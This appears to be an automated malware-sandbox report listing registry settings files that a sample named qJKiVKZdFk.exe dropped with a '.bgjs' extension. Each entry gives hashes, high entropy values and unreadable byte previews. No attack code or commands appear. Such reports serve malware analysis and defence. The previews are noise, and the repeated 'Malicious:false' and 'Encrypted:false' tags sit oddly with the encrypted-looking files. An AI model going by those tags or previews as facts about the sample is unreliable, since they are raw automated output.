                                                                                                                                      Preview:....8.F.c..X....).R"...5[...q1.oXx./.;..`?f /._z.\.,.;.S......Pjv.>...p|..N.-.#d.J..>.....|....A P.*...K.7.q...:.]..mg....E<........p.....g.l..x.A.r.6g.!.K(....L...r..../....p...E.{.G..D.KH.d#Y..1.r......CJF...7.8H(%S...K=Q...1...G.......?.}..g..x9..w.n....go.`H...ia.t..H.].....@..<..x......=x...........:1...v.b0.c..c=.....35.++W...z/....F.....?<..{<l..[..JY.D8..gt..l5.?>=...j..GG7,..4..A....J.?.>@....<....H*..!..z....<;....paI....>XZ;....9'..m...W...).G^..{.Dl...p`G.X..T.=D.=...E....Hn.I.BN.j....}.%..b....pW.|....,...Z/.*......=y..l...0....$[~....|K_.q...W..f{...)&.=....^......d.:sTW..).....P.#...3.T.tE;.sn.#..a.c.0sf).`z.[.,.i#....*\8.D...M......''............t..pHT!v..4og" ...`....L.Pf..%..TS.a......[v.p.M..;Ok<.........H... .5...j8`..2.F...j..e!.7...-..i.!..?m.C.hIs.B.5(...f...........v.Ej<..o.%...N@.#..V.....1:.p.:T....K.}^.GNy.....P0.. E.6.s...ED^..{..7......S..CnI.$...*..9n.J7A.......:+.(.'.~.oG(..F=j...C79I04..p.2n\

                                                                                                                                      C:\Users\user\Local Settings\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978468670162599
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:AosFGXuXu04om5DAh2MgU5Y0sbX1INy9LK62WVptT:DsFGXg65DQpnWbuNydjT
                                                                                                                                      MD5:1A01D84A5E65AB8C874B5D4B9B7D5053
                                                                                                                                      SHA1:4FE5C5E44A6C9D35B21EC09679039224FAC533D8
                                                                                                                                      SHA-256:7393A0D1A3A4198BB858BFB9EC036D5AEF11F915736E8EE6D86E5813C49EDD86
                                                                                                                                      SHA-512:A73077F6CBCFA434385FA5FEEC05251C98B01742D2C19315B00E30B1F455FEE8B008BAF6C907849412CC426939765CD4C7F26EAA295E538BC78CD275E6BA678E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.....,..$....a.c.K...T...Y.L.=.B..eE..!.xF.5.u~.F$..Z..........:.$...?..u..<"|...*...0C\..g...4Pv!.._..>......04.b..N..G...o|.M..[D...Qk.....[jt.z;...rg.p .3g..`....S.Z...rb...f...].%B..<\...O.k....}8...-...y....7..mO....Fwv...N..............e.(.pX..&..L}.o...0.....?.q..." .@U;.2|3.).(..~.....+.....[1J.P.-....).wa..5c.....rU..R.)L...3.b#V.Z......x....1+..d.>...0.}.6Lw..C<..)LugUus7....c......02:[`..+..6s.FW.z\V5.<.%To..j&..W....]*.#.../o88z5.H...0.}..[.k.?,).:M#..5.......6...B2.4..~...n...nn.7..'-.....%...?5...Z)..E...D..n........!....)R.*c./$FW....P.1..3..r. .z..D....v.9GV....M.(...."...W..........:3.`.....N.....+..%.u.g..@z.PTAp.CN......W..]........r.^0.l.S.......nI.~.....JD..3....3..T.-.........^...U...d..S.~I}j.9.q...}.,Q..[.....XU....... `..t 7..I[.......X...mk...a.w.!.]..`_..7.NtqN...l /v|^..!.-gL.@..H...$L.i.z[0g...T..8.#...z.,..J..fV..(..~.d....0.........2u...v...8....l.........#6V....@c...2..<.......T.....\...y.y..^.m....

                                                                                                                                      C:\Users\user\Local Settings\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978061143300296
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:2AMpjX2vMwR/oDvYb1imu5XFEQQS49s3s1zk4a4mDwjmxXyi595r7:29XjBYb1ihVE2sm4jjgbH1
                                                                                                                                      MD5:771F3842040EC0B3407E0AC95A4DB948
                                                                                                                                      SHA1:D5AEDD8E8EFC89D60A6DA7367006DAB523F55FC4
                                                                                                                                      SHA-256:DDD408E018957CA9620F44A23713FCAEB30AA3F3EA3ACC6A1C15330B68E6AB66
                                                                                                                                      SHA-512:6773DF0234DAB47C1EB3B44094359C3E4FCD18B3663FAF0FEED676174D5D65D672E35FB38B251285029D9257A05F7510ECC57FD07417EBBEFAA885EC08EE24DC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...iE..t.l.3fu.#..G...y.}"......q?..H.'_*.nM..^.a.".Z.....`.u.a..6.o*.L.j.;.23p1..'.W.G.&x.J..Z..k ..u.g.e..5.?...xg...!.b{...f.e.y=...HrAL.K=7..B..^D.. ./....\$..O5%..MUt..c.~<g..ls7."...Vxn.......H.........#.(d.y.opU....o....Y...J.5...x..6...6.{.n.%b..:......d.7.Wt.^|...=C.....H........o...R.....<...C.`..0.E!..'>....f?.=........(.)..,..KrV.[.(.7..g<&`.!4...c.Z'.C...0....a9..v...0}......)...%.XOf....T...i......J.JEG7n......C.G.^#..UE..1..+.7A_.].>g&.."FZ..3I....r.4wgh...+p.Z.!?OX..$....x..zk..<....<..........@<...zE....U..f....t...v..\/z~.?....I....S.m.Ld..i...*b..F.n....P...E.%'3...$a\....f......D!.Rbt.Mhi.6)..9...R.I.....;..Q......l.....[w..a........@..`z.T.@!....d.qv....I'..!.....i.J..X..B\z..[.W^4.[*S$P*]%.~.qCm.{..K...K.U.~V..|.5.R>.5~m.L..I..#:..3.Qo |.....[...O.{/...[..J..dq.;1.....0C..t_..[RAo<.&Q.......Gt...)....]S.A....q.>lL%....LL..I.V....."GU.xt.fx^O.t.F....:.N..t.<..}..\..'.".7@..&.O.R..u.......d.{...=3.s......a...fV..Q..^

                                                                                                                                      C:\Users\user\Local Settings\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978508872035781
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1w9K/dc12X8vZ80LL24KrScV2BHDekvu+gE2Hi8vXf8:O0a1DvZ8+LcXkD1t2Hi8n8
                                                                                                                                      MD5:3B0124CD532908C4C4733B531F865789
                                                                                                                                      SHA1:357BE0CA39A8CD0874383FC112CCC579B57A63C4
                                                                                                                                      SHA-256:5DB39EC78A1522084DC247AC4136A399ED79381F5230BE0606FBD9E834BC101F
                                                                                                                                      SHA-512:C46F06F772727A2340909F2243047B5AFFAB14C7D996C81409157BE84C8E71C209A6724347F719635656DED24A3F72C8202EA1A4B2E37700B93ED64173C5BE98
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.....X..d....E..6...u?X.....$IBN..g...i.U..EhE......`.&.P..J.r.m.cI,Y....`.!)V........S.:h...;...........P....-a...f..i......L....'bMv&*.......P...a..X...1.K....$...b9._.s.k.....F..CR..7.2.=.i...8+.u.3..#?.C..<.k..^....N.v.d.P..q..v...h..Yk.S...a...c?..5.K.<....Q......ed.;...|1.*..E[,..>..db...Ao@l]..t........`"=.../..^............B*.~.&AJ/R..#A.)....o...M..z... m..C`:..{.Y.uMT.~......{..'v.}9..d...I.....u..W.<B@B/..3p..*{....+l..$T`z.eY.C.:d.^.0t.....X#...<..P.Q.........V..p|.mH.D..+BY..8....:.........L.X..]..........\.....'.....p. ......3..,0nd-...6.8.r!F...{....W..|.N.gv..l.. .o.;.h!...v.e s.........T..u...a"@.q....$...}.J&/....F..D#.t..Bm.o....3.Z..Gm..3x..~./o!...,..'..Q.._.|.2z..E..7.Z.....=...&"@.;.r~zj..;..U..J...)...`.}W...<..g@4....i....5.a.t.~..Y...+t.]b@p...#.X`...?.J.N.|.......:.....G.Aj9.!...^.`iG...N`u6.7.o..*.F$...I.D.Z"wz...z.......:.w..q.a.w..Q...Mp.8.H....`.Y..c..|M.F.i....W. T9U.......>...M....x..!j.\.L...w+.|

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974458823615938
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:h3XN7B0RK8PV7xN0Re5K7RzthXAI/P8ZF:fwK8PVdm05ARzMI/SF
                                                                                                                                      MD5:380BC269A0D8C368794957756B3B6A33
                                                                                                                                      SHA1:F86920CED1958187A2AE7C5D75BC6FFDF5993201
                                                                                                                                      SHA-256:70CE5AF565C11BD71FE75BAED1FD94302DDE98A30FAD901881002AFB5E13CEBF
                                                                                                                                      SHA-512:EEF3B47957C0B9E98D67445BF46EF94B1167D92326291B492D136EEC4365B29952913B73EA896A9F6DC17D5270DCB6AB35FA679EC9BB743250439D4E033116E0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.!:.G......fRQ.A..A.Hn].ik.]1P.......Htp..m...{O.j{..........$.....B....$..$.....a...e.c PC........v~Z...{.H9r.^.2.+*ce.........w.L....}......c...1``S.......`......I^|..h.B.w.....&^X._....[..\.+....Y.*.M."a6F...g1Kd......0...I;.E.XK:..8)..B....A...............$..q8J.,r...qf._.`k.@.~....D^<.p.5..e.A..[......B.4Y.....g...m."r`...S._k.j_.... .......fz.........@.d=VY)..y...=..8<.=...y|S.:t .....S?.2_....../|D?.dZ.X.....{.Gi....Y?=...E..'$..0.6...2....m.P....k.9.s.:.......i.=.5.....RC...1#n.N=..J^.....f..+.tr.]..;.V.a......w5...uB.........P.i(.V...i.e. oC.Z..0..O.....U..kM!...."M.....R.x...S(.g...^.\.i6.=.j...@}.hu4..S...".....^..H..o_.Q.....!q.9P....I.F....RD..l.k4....M`..1N$E.t.$.<.+~m...x........iC...!...?......(................r.fL_....S.~...$.1.On8..\F.6T)...0.......b.?h..r..M.'...t.f.(2.C_.Ud....\..z.f. .^9Bs......4M..cd.R...c.+z...j.qS;jx..b..I..c5\.=..l...|Dvy7...+Hl.U1f.......W.-=XG..<".N..W<Ud..]v...3..:...j.+?u.;.i....w

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976869720141004
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:kT4FOVBZq95RYsnbkn8FwfTx5ZXUxfJpAq2K2dr:kT4sVszHnbrQTxcnKq2nx
                                                                                                                                      MD5:406183B63A875F8D67576F5B5B616E3B
                                                                                                                                      SHA1:CDE656E959C375726AED4A6D8CC1F5D4065F2E50
                                                                                                                                      SHA-256:B38603C7837478D2450B284B8AA46D33D00866BB021E72DE3277BE62021E1B7B
                                                                                                                                      SHA-512:5E976C5F9453DA476AAEAF0234FA8560229FA666D99D77D689F1450007C8CD916ACEB5FD394FC6A9818090F45BE8ED41CDE84A77EAC720F7DC03D1BF444B7F17
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...y.[.......jN.z....X.v%c....~..'2..z....4[P!l.2.5:.=x}u".(gk...-=..4..-..H4....>...j....5I6...n].%..I@....Ho.G.....RR..x."..%r..<_......q...M2xAch.pf..R..4...S..c2l+O.ef.Ngx......8&..}.....m^.....x.8...s..l.[.uK.................J.'...G..k.f....?....)....I=......-MP...gZ...$.d...~.......bI.....1.r.l.i<(E.0...AQ.xx...9+/...B..^...>/-Y.........v..~.B=....*....qFA.g6.{.g.A^.....@I.9k...0R4+H"..-.gv....K...;..m.....e....~..OK.........'...z-F.JOD.`...O...O8...9d.zI..q|.%.u.d....O.{.fS.J{..y..N{.._.1..{...;.S...D..C..Y.B...;.....8..0.....c$e+.v$2:..@'J...%'.e.......,..0....+U...'....mb......tX.&\^..QC.....u.t.-X..}..V.1..'...h\SCl.._.A.(..&..C.'...d..R..'.;.9{.5....4...K.x#........[6...q}.U..Y6....V...5r.!*Rv.vYM..... .F;.R..`............&...#.x.:.._._....B..J~.k.s...v=.;.q..J...u....AxY.9....C.M.g....O..?'.Q.).R.F..+.-.......s/...LM..Z`.*...g..6#......m#P.N...$.>.r$Syq...D.E..jH.<....R.i....8.R._...n.......n...*z:....=*(.cp.....@.l...I!G.g.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9790116584857245
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:U87Q+MfkV/iBhgVrAnNufjx/YXX0F7vFqngXxLGh:U8dZ/ikmIjxg0F7vFKghLGh
                                                                                                                                      MD5:04636DBB9C98312030F89BB82076BFE3
                                                                                                                                      SHA1:24F5ADF175A0DEC4834C5FA7A41657DE3CA34053
                                                                                                                                      SHA-256:EA548E0DD016E1D0A7FAC3EB51B263D93AD183B297FCE265FFA78D12A1079CE3
                                                                                                                                      SHA-512:670B30A16882D007A50DB7D4D6BD6D0CBE4F9121EF29E8558EB95E111D62D93BD027C1F04E69741F2FC3B466D9E3DA187609FC9E67F52B9D75642B7255499EDD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...9;P. )."C&...Q........;.iIL.2Q.z.6IZ-;..x!.D..[.TB...S.Q.X.u..A..m....@.h...H....S...mtq>.U04..|6.6...Bz..].dg}..]00.&....1Q.w=. ...'.!Z#.o.0...~..K...LE...|.._GW>,....E...,........x..Z{.J.t..=..lC...;.T.....`.p.^.*...w.=M.D..S..)~.<5IE.n"HU3..2......x..+'X..Tn.h...3..K.0{..Po.x2../V".<\-..\[..}.v.AS.pGa4..NN..{.+.q....P...].?..4.RN.....p..'..$...V.4H.......q..Y$.*E.j..1..h>.y.<....p....V.l.%BV....aB......l}.B.A.i6...?..j..A....&$h..X.C.........E.=s!1.:.w..C.+l..[..V/.,.....D.E.QC...$.$.A....fu....;......1U...Y.'e..H.....@.7..{{T..K..V.[..S.+....7t:Z..f!] .."...l..]............".q........8l\..-3QI..43Dc.o....i.4..C..h3....e.i....\6w...(M</t...&.....N.@..(........BM............r=.&7...x.m......{..0....I.#Q...3..U...8t..oS...!...z;.i.!.[..D....^?.".k..Km,.~.J._$*=[D.......^.Pn.V........Q...Y.,.. ...2..C..F....Cu..a<.....+...x..:....O..S.zVN}y.."l..~L.A..!..N.K.e....zZ...w..G........I.:...X....bM..{.$=.UzlV....8...w.z.4...?.....y

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975911136064438
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:zVG6eHwcH9vf+4zXxnycehy3YtsNhYkxZ9rHzfyh+HtMHoPy60:5G6eLHF7zXLoyI1wZdHOINMey60
                                                                                                                                      MD5:F049C762DAD0FE585BA5100606D2103A
                                                                                                                                      SHA1:7073C332CE5C3660D5389A3F1C0AE5B49EA7EEA7
                                                                                                                                      SHA-256:968EBF173049FE2FA2E037E81689C6FE693614D6A1C65DAEE2729D2AA633EEBC
                                                                                                                                      SHA-512:25B3D4E09A2A347EFF7761744F2FF742DCE7A875F9E753A299BF28871F76DF5047515D63C75D4465E29C7D0B77163DA3020FADE5C4B9672AB7374CAF0CE1114B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.O."..Ub...97.w.#.wq3..q,.....G2...1.d....K.$.q........_.&ps.G....r.....H.)j.L]z....1...x.m..$Tc..\.|e.....F....9...\.Q..a.z...!.r...... !.n....E..R(xUC_MbsoU.pn.{V\I...f...f....].B......h.u.P.~.Q..AE.q....K.V.0....[rh.*^.?I.c.7......le$s...kQ...P1..F-. ....Z:.F.g...s-.}d..+.M.......z..D=9`.7~AQ.!....$\.'@?.c.......6.h.1...h......Z..J....i...aNr~..W^"../Xl.a..{... ..o..q.#2.........&..b..t.W...=...4......J\.._#f......M%.9...S...Q.[.......%4...6.,..Z..`M.@Y..F'.U1..7....K.\<.....7w..L......i.b.\B."...:Fw.-...~..T.~.f..6F~..~.5.=i....q....].;Q.....B.VJ@.......|...@$..:._.;....4N......R._e.A..&n.S=.......3./XOFP...,[.U.fKOW..C...X...S.=..t....i0mD0h.A.A1#r'Z.X'}.Qy..c...5.........@.y...@..r ....(..k...g......#R..P.0=..,..,."....3.y,...s).i\|...>...wT.o.0...nwET..Y..K\."*.$.=.bs.n..jlk.3............q../.#.xk...../6.."..._.."@....B....RE...N..2j4...-h.L...U.T.#..va.n)T..wH(...L.J.)q.L...C.....A9..G..3q.-Aqf..v~...o...lc.m!.C..[..X.I.6.A... O4=.+.8.L..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978776964043097
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:8uLy50U8ki3GlrzxZ32CQ2sbIQs/BLmPvH+7EvX+TQvf3lFHpRrnjd44/mTgLOXG:wYWlrtZyfCIdv53lZnp44OpwRXZP00
                                                                                                                                      MD5:DBA0D292B8BCAB271E1D7079EC2C6E41
                                                                                                                                      SHA1:4A694CD1C4778CCDDA291BD7EBDB6FD1AE86869D
                                                                                                                                      SHA-256:2BEB5F50BCD869FC95AE26FF962BBCADE98A7A99526CA4816141881B85D9920D
                                                                                                                                      SHA-512:7A82DCF28275F0FCE41193EFCD5380DBD06E590BBA505FBF949D1B6AA084A2A1A1B52668F04206C37A6ECC2E01F8C23371B03C31C10A60EAB310AE0BCC74BFDA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..M.&.F.9.y*..xCzG...r..D@{...... ..r..F!W...-.(z..\d..y.|}.....8<$.@..#.X]k..+.Pc...w....@...(|...G....T.[.........So...S....PR.}.e..K..wN.)eJ.......!65L....K..@.{......W...xQ.J.=gh.,...(>....8o8..RB.....`..r..........s..a...2....E.C...k.....L=.J,z:.+....).x...X..b.c...8.-hY..I....I..'......G._..L..9(M.............<...v)2dY.3.rr..:...Co.0^.......!EG.J..x.........,..-.Q_D.'Z..l..gU\.(..c...=]E].H&c.I..m..e._-Jn....y.o...p....P...?^F.-...+yC.S....09.....U0~....>RO.\...*Kn....~.I.In....i.0._.._...SV.{r..[4Z..#..dy...YLX..F>..?.w..V@......E.N.|t...oo..p.....J..,.+z..J.q`...a.s..9.$...D..d..W..,....)4.:Qq_..1.....LA.W.s.[.Cd&e..#w...m.&G.....zj-m..Mk.9..Qq9(.5....^../...s..a.A....x.Y.<2........"......Cg...h.z...&.v..6..5.we.B..5.P..|J.s..&xB.Z......^.Iq.07<.W.R.6..WNGbl.3<..9......`.?..@.-25......5.-.C.......i..#`.i....h../....H.1.0.s..6...J.r._..........&...K..+V..,.n<.........@!...h....$.u...v}.|...n..k#6..*...9..i...AN....

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978062822478387
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1slv+yTDwqBgXng5yi3C8QkErPzvHQpJqO+aVbrmRaOtR5FfI5yYHnW:1sZ+kD98Ti3CBzD7+/tBtnW
                                                                                                                                      MD5:DD2EF61967B05D13157DEE7A23194439
                                                                                                                                      SHA1:1B4562A515718F16981540DD3693B18569230773
                                                                                                                                      SHA-256:8C3B4ECB3A71157D21A1F857E5113F6C6A645A774E135BDE337C81C8EC2375DF
                                                                                                                                      SHA-512:6EC356A2742D497F38FCF1960B5CDF8C7F93EA6FCA3032207B82FEDEEEA4BB67B3E767ABC9BC10122415970A069B173CA461CF3797228F23FBF14DFD0A14192B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.Bk :hB..SH....E9.fP.....n..N.h......."O........G...P:....Y8*.{.....J...Ca....x....e..Q;...~+p$....?....2..U....%....h.......'3U5.>........p..~..#*"v.V2 .E.U.,..5?dtk`{.O.#qe..9*.x.^....8P.....#a.E.....[..b.[d&...-..|*...n.].]j..>.9...[...0..<..v...ir+.Y$.P..%..c...L._.(..mzG/r.A../.H.S.i.kIg.t....B.....~#K..4..+...f<.5...../1.7.%..x6.....D....\/.g....X....,i+p0..im..fc....._n.o..r...9,7..;.C.......%..e;..7..X.......}...8"........>.....n..O>.....nBI`.x...f....A^..1.}u.jn..I..O. ..&.$.s.Y.>..r?.D......Dh....j......(p...._...q.........m.9.. .~!..$.:...m...l..../.JE.6$"O......t).m.......qr.Q.........A......z.*._...;Y....4.....n..).1`......-..m.V....o!|%..[Y.eK...H.U.......Z..../7.Cb.\v~8.......P..H..'a.$?.P........_V.T..J%.:..%.....$.8..<.\....o.V.A..E><ycU%...~.@.8.C..r.{.......)..&2r.6.$......c$.Vw#Jm:.<..s.;uX...r....I..#K..U.(...h..r&I....!..O.4U.........Cu.$....=.x.@_..>.x.}M.....McH...a....]..8+3.........B..)z-..LN...ma0...B*?...

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977669149702758
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:kYkZkhLHXoeEipb2Co+zzH/Bap1yO3ESujCT09Is+Nj:dkZkhr4ipb2CB/KyOUVuzxj
                                                                                                                                      MD5:FBDAD1433B9EE90F590BF262837A8728
                                                                                                                                      SHA1:347AAC5F64BAFCB86B63C1C3948CEDD509EB270B
                                                                                                                                      SHA-256:1DC5322B962E8F4A1120CCD6E5668045979D79F88DF20795F1BAEF725A7B8325
                                                                                                                                      SHA-512:308D2DA852358070E8AACD0954FC42F910BC669B2244D94F2B90DA11393E3402FEA0C9FE143DF0C40171360E71BD15E7BB88ED145E4B4936823D1B5E995AE88B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.G....*:x....N6HY.f..n....=SC..Y.....T..L.dN.ki.....y.m.....V.:OP?\m.Q]..s.=].....K...\.........?=!._J.S.e......,..QoL2.i}....$..GJ=.....b..,z.i.*.-c.....1...4q...GF.<~..H.,......"...YpU7JI*R.....N.....[R..."..I.>.;..K[O.C0.}..7.F..$x\'Q.+..dK.......!.K.,.xG...5'.dk..O..b...d..V.....&P...._.|I._...-|C.MusO.1...............[tJ..6C.Z.#.C...0..\..iZ.....e.P.~..W..n.)....^9.`.)Ea........6w .....J..T.9K6.I..=./.[.}q".....x..;..R.zl.;......3...d.dx...j.lk......*.......:<.8........>....;......I...P(.=H...&....%n.h}..{.9.C......e.d..Qn'.|...y.......$...'...y...r...m..%.ld.{hgr8..+;.a.L..$....L.RBS.)..Y.%...8.S~Y..5.tqM.BMA".Xw`:.~w.....HR ]..........m....e.v.*oRKp....@......BJk....,.<.1..vX...L{n...Q..O....D..a.E.9Y..=.].....E.s.........M..?.xi1...YH...l..l.g-..5.|0..m%!AG/.......j.W...m.u..Rq..?R..1.x..y..7..........{u.K.94i..A.zt..T<...>...L.6~....vu_......tk..0k.....N..+T..$.........[..&,..6..w.E...4X..E.^.V..8.g..B........Q.J....2

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976895234718322
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:8z+KRjVyo+Dj84WqppOtG6KSmI3LevmQD/3E/T5bDA9mv:8Vi0iavNFL4D38T5bDWmv
                                                                                                                                      MD5:805F96D78CE21BA68067E3A07443410E
                                                                                                                                      SHA1:A1434F00D657D3EC5878B251130F41D21275EBEF
                                                                                                                                      SHA-256:C2D31900A1782F725DCB54344541464EF15413BD7D6E3C5B016B194BBC7DBA3E
                                                                                                                                      SHA-512:27974B6AE717436F1E18EC9CFE9DBB046181D067CA629D5E428645477005AD3820F2D87262D2795E69F6BB9DFA38D6941DF8706468482D003E18F31050FE3D57
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....\....t5h..L).<.|z.......^..........<.4HA..A#.5. 51o..xe..A%.u.A..^......9. VD3.......d....&..@T.....o..7/........PZ..5...D.?J.?..U.D..oO5.....(3b....).).hG...o.p.Bz..s.[..`.}...eT!(4|....8dz..!.p....8p.hlP..r.V......)E..DF.......).d..;...`<q........[.SZ.g.. ..i.....-D.8I..>a..:.....w.....!....n<SC..........n.?..Y..G.-.....w......U.W.{..B..S.x.......=.q...f.y..e-n6..'.}q..=..7.0...b.i...b.9.=.?...*.^..jg+.6.&......8M..\.:L6..B...CqC...C...%........,..D=.......S).!jI.P$_.pL....De.0.\J......7(.F.K.f'..v..1l..d.W.....f..'........a^;.T}...V....`.~.....Pi.g.......#..&.n....ve<}.Z+....q...Rhr..7)..=B.b...#.K......_;.6...:W../cY..!..n.;D]3..2...ri(......<5.>......q.;.%.FaF...p.......R.].....SD.nf~...$.x..4.T.'n-......%%H..\r?.3Sp.....1...O..a..J....6.!....NW......m...;...@2S..80..~.<.HL.C...U.+.`y.P.....t>.J.......J.2.kf.K....C..pzg..3V0..c..e.)$.b...................dg.......,[.&.."WQ......C..G..Jqa.1.\..,..SU..4.....?...........M.|h

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977630295175919
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:MYTulB5avpxTg1HAE6IfzK3dAC3hC94XuTl1fZmiwx1azLhsUq:MGPpWHAE6ye3dN3S4XGl1fZmn/aY
                                                                                                                                      MD5:3CE87F237033462980930F775B333E50
                                                                                                                                      SHA1:DD3F260FA9AB104ADC7F523C406A5D38100282D3
                                                                                                                                      SHA-256:0993A0D367B3F7C29452F0D8E838B21C426FF965D52A9FFD8CE093E394BEDDE0
                                                                                                                                      SHA-512:FED83CFF3AFDC15F97738D47390AC6738DAB35F3FA3212A87BF839FF7E3C4F8A64A0AA504C58EB7A8E275EEB8CBDFD5E93B0B126DD92E46CB0A99987595CB117
                                                                                                                                      Malicious:false
